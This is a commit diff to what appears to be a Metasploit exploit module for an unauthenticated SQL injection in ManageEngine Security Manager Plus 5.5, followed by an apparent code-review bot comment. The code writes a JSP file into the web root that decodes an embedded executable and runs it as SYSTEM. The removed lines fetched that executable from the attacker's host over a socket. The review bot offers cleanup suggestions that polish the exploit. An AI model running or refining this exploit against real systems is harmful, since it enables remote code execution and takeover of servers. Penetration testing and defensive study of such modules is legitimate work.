Write EXE to JSP instead of using a TCPServer
parent
e5ec51a780
commit
923ffe277d
|
@ -11,7 +11,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = ExcellentRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
include Msf::Exploit::Remote::TcpServer
|
|
||||||
include Msf::Exploit::EXE
|
include Msf::Exploit::EXE
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info={})
|
||||||
|
@ -19,10 +18,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Name' => "ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection",
|
'Name' => "ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection",
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a SQL injection found in ManageEngine Security Manager Plus
|
This module exploits a SQL injection found in ManageEngine Security Manager Plus
|
||||||
advanced search page. It will send a malicious SQL query to create a JSP file
|
advanced search page, which results in remote code execution under the context of
|
||||||
under the web root directory, and then let it download and execute our malicious
|
SYSTEM. Authentication is not required in order to exploit this vulnerability.
|
||||||
executable under the context of SYSTEM. Authentication is not required in order
|
|
||||||
to exploit this vulnerability.
|
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
|
@ -87,16 +84,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
#
|
|
||||||
# Transfer the malicious executable to our victim
|
|
||||||
#
|
|
||||||
def on_client_connect(cli)
|
|
||||||
print_status("#{cli.peerhost}:#{cli.peerport} - Sending executable (#{@native_payload.length} bytes)")
|
|
||||||
cli.put(@native_payload)
|
|
||||||
service.close_client(cli)
|
|
||||||
end
|
|
||||||
|
|
||||||
|
|
||||||
#
|
#
|
||||||
# Generate a download+exe JSP payload
|
# Generate a download+exe JSP payload
|
||||||
#
|
#
|
||||||
|
@ -104,43 +91,30 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST']
|
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST']
|
||||||
my_port = datastore['SRVPORT']
|
my_port = datastore['SRVPORT']
|
||||||
|
|
||||||
var_buf = Rex::Text.rand_text_alpha(rand(8) + 3)
|
native_payload = Rex::Text.encode_base64(generate_payload_exe)
|
||||||
var_shellcode = Rex::Text.rand_text_alpha(rand(8) + 3)
|
native_payload_name = rand_text_alpha(rand(6)+3)
|
||||||
var_outstream = Rex::Text.rand_text_alpha(rand(8) + 3)
|
|
||||||
var_socket = Rex::Text.rand_text_alpha(rand(8) + 3)
|
|
||||||
var_bufreader = Rex::Text.rand_text_alpha(rand(8) + 3)
|
|
||||||
var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3)
|
|
||||||
var_temp = Rex::Text.rand_text_alpha(rand(8) + 3)
|
|
||||||
var_path = Rex::Text.rand_text_alpha(rand(8) + 3)
|
|
||||||
var_proc = Rex::Text.rand_text_alpha(rand(8) + 3)
|
|
||||||
|
|
||||||
jsp = %Q|
|
jsp = %Q|
|
||||||
<%@page import="java.io.*"%>
|
<%@page import="java.io.*"%>
|
||||||
<%@page import="java.net.*"%>
|
|
||||||
<%@page import="sun.misc.BASE64Decoder"%>
|
<%@page import="sun.misc.BASE64Decoder"%>
|
||||||
|
|
||||||
<%
|
<%
|
||||||
StringBuffer #{var_buf} = new StringBuffer();
|
byte[] shellcode = null;
|
||||||
byte[] #{var_shellcode} = null;
|
BufferedOutputStream outstream = null;
|
||||||
BufferedOutputStream #{var_outstream} = null;
|
|
||||||
try {
|
try {
|
||||||
Socket #{var_socket} = new Socket("#{my_host}", #{my_port});
|
String buf = "#{native_payload}";
|
||||||
BufferedReader #{var_bufreader} = new BufferedReader(new InputStreamReader(#{var_socket}.getInputStream()));
|
|
||||||
while (#{var_buf}.length() < #{@native_payload.length}) {
|
|
||||||
#{var_buf}.append( (char) #{var_bufreader}.read());
|
|
||||||
}
|
|
||||||
|
|
||||||
BASE64Decoder #{var_decoder} = new BASE64Decoder();
|
BASE64Decoder decoder = new BASE64Decoder();
|
||||||
#{var_shellcode} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
|
shellcode = decoder.decodeBuffer(buf.toString());
|
||||||
|
|
||||||
File #{var_temp} = File.createTempFile("#{@native_payload_name}", ".exe");
|
File temp = File.createTempFile("#{native_payload_name}", ".exe");
|
||||||
String #{var_path} = #{var_temp}.getAbsolutePath();
|
String path = temp.getAbsolutePath();
|
||||||
|
|
||||||
#{var_outstream} = new BufferedOutputStream(new FileOutputStream(#{var_path}));
|
outstream = new BufferedOutputStream(new FileOutputStream(path));
|
||||||
#{var_outstream}.write(#{var_shellcode});
|
outstream.write(shellcode);
|
||||||
#{var_outstream}.close();
|
outstream.close();
|
||||||
|
|
||||||
Process #{var_proc} = Runtime.getRuntime().exec(#{var_path});
|
Process p = Runtime.getRuntime().exec(path);
|
||||||
} catch (Exception e) {}
|
} catch (Exception e) {}
|
||||||
%>
|
%>
|
||||||
|
|
|
|
||||||
|
@ -156,9 +130,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
# Run the actual exploit
|
# Run the actual exploit
|
||||||
#
|
#
|
||||||
def inject_exec
|
def inject_exec
|
||||||
# This little lag is meant to ensure the TCP server runs first before the requests
|
|
||||||
select(nil, nil, nil, 1)
|
|
||||||
|
|
||||||
# Inject our JSP payload
|
# Inject our JSP payload
|
||||||
hex_jsp = generate_jsp_payload
|
hex_jsp = generate_jsp_payload
|
||||||
|
|
||||||
|
@ -211,19 +182,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
# The server must start first, and then we send the malicious requests
|
# The server must start first, and then we send the malicious requests
|
||||||
#
|
#
|
||||||
def exploit
|
def exploit
|
||||||
# Avoid passing this as an argument for performance reasons
|
@jsp_name = rand_text_alpha(rand(6)+3)
|
||||||
# This is in base64 is make sure our file isn't mangled
|
@outpath = "\"../../webapps/SecurityManager/#{@jsp_name + '.jsp'}\""
|
||||||
@native_payload = [generate_payload_exe].pack("m*")
|
|
||||||
@native_payload_name = rand_text_alpha(rand(6)+3)
|
|
||||||
@jsp_name = rand_text_alpha(rand(6)+3)
|
|
||||||
@outpath = "\"../../webapps/SecurityManager/#{@jsp_name + '.jsp'}\""
|
|
||||||
|
|
||||||
begin
|
inject_exec
|
||||||
t = framework.threads.spawn("reqs", false) { inject_exec }
|
|
||||||
print_status("Serving executable on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}")
|
|
||||||
super
|
|
||||||
ensure
|
|
||||||
t.kill
|
|
||||||
end
|
|
||||||
end
|
end
|
||||||
end
|
end
|
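Review bot: The comment kept as context above `def exploit` in the last hunk still reads `# The server must start first, and then we send the malicious requests`, but the TcpServer mixin and the `super` call that started that server are removed in this commit, so the comment now describes code that no longer exists; `# Inject the JSP payload, which writes and runs the executable on the target` would match the new one-line body. The header comment `# Generate a download+exe JSP payload` kept in the third hunk is stale for the same reason, since the JSP now carries the base64-encoded executable inline instead of fetching it. In the fourth hunk, `my_host` and `my_port` survive at the top of the method (whose `def` line is outside the hunk) but nothing references them once the socket lines are gone, and with the TcpServer mixin removed the SRVHOST/SRVPORT options it presumably registered are no longer defined, so those two assignments should be deleted rather than left as dead code. Inside the generated Java, `outstream.close()` only runs when `write` succeeds and `Process p` is assigned but never read; closing the stream in a `finally` block and dropping the unused assignment would tidy the emitted JSP.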